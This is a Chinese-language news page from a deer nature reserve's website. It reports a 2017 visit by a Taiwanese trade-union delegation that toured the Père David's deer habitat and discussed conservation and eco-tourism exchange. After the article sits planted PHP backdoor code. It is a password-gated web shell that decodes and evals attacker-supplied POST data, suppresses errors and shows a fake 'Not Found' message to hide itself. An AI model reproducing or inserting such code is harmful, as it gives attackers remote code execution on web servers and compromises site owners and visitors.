最新要闻

首页 > 最新要闻 >

    台湾连江县工会参访团来麋鹿保护区交流学习

               2017年5月16日,台湾总工会理事长蔡明镇带领台湾连江县工会参访团来麋鹿保护区考察,盐城市总工会副主席周新民,盐城市政协副主席、江苏省大丰麋鹿国家级自然保护区管理处主任孙大明接待参访团。

     

    参访团一行15人在中华麋鹿园游客中心大厅观看了麋鹿电教片《归来的麋鹿》,从历史和自然的角度认识了麋鹿。随后乘坐游船从水路参观了半野生麋鹿的生活区,了解了麋鹿的特征和生活习性,并与他们本土的梅花鹿作了对比,孙大明主席又从麋鹿疫病防治和饮用水源方面作了详细介绍。参访团对保护区“以科研促保护、以旅游促发展”的治区方针大为赞叹,并表示要建立长期交流平台,互相交流学习怎样有效地保护野生动物以及如何实现生态旅游长足发展。孙主席表示,我区作为江苏省对台交流基地,非常愿意与台湾兄弟单位互通有无,交流经验,共同促进两岸生态旅游、文化领域的良性发展。

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>